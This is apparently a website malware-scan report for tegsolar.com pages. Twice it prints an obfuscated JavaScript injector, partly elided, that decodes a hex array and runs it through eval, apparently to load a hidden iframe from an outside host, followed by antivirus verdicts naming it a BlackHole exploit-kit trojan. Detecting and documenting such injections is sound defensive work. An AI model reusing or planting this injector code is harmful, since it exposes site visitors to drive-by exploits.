Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_005.htm | 200 OK Content-Length: 10208 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Sun, 14 Sep 2014 20:49:42 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html
| clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.tegsolar.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |